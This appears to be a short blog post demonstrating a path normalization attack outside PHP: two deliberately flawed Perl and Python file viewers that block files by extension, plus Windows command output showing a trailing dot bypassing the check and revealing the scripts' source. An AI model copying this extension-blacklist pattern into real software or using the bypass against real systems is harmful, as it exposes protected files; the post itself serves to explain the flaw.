A month ago the italian security group USH released very interesting article PHP filesystem attack vectors where was described two new types of attacks on PHP. One of this attacks, the Path normalization attack, for example, may allow attacker to bypass filter of a file viewer that blacklists certain file extensions.
But Path normalization attack may be used not only with PHP scripts. I wrote 2 example scripts on Perl and Python:
test.pl code:
#!/usr/bin/perl
use warnings;
my $file = shift;
if ( substr($file, -3) eq '.pl' ) {
print 'shit!';
} else {
open(F, "<$file");
print while <F>;
}
test.py code:
#!/usr/bin/env python
import sys
file = sys.argv[1]
if file.endswith(".py"):
print("shit!")
else:
print(open(file).read())
PoC:
C:\Users\User\Desktop>perl test.pl test.pl
shit!
C:\Users\User\Desktop>perl test.pl test.pl.
#!/usr/bin/perl
use warnings;
my $file = shift;
if ( substr($file, -3) eq '.pl' ) {
print 'shit!';
} else {
open(F, "<$file");
print while <F>;
}
C:\Users\User\Desktop>python test.py test.py
shit!
C:\Users\User\Desktop>python test.py test.py.
#!/usr/bin/env python
import sys
file = sys.argv[1]
if file.endswith(".py"):
print("shit!")
else:
print(open(file).read())
C:\Users\User\Desktop>
0 коммент.:
Отправить комментарий
Большая просьба: не оставляйте анонимных комментариев и не используйте в своих комментариях нецензурную лексику без дела.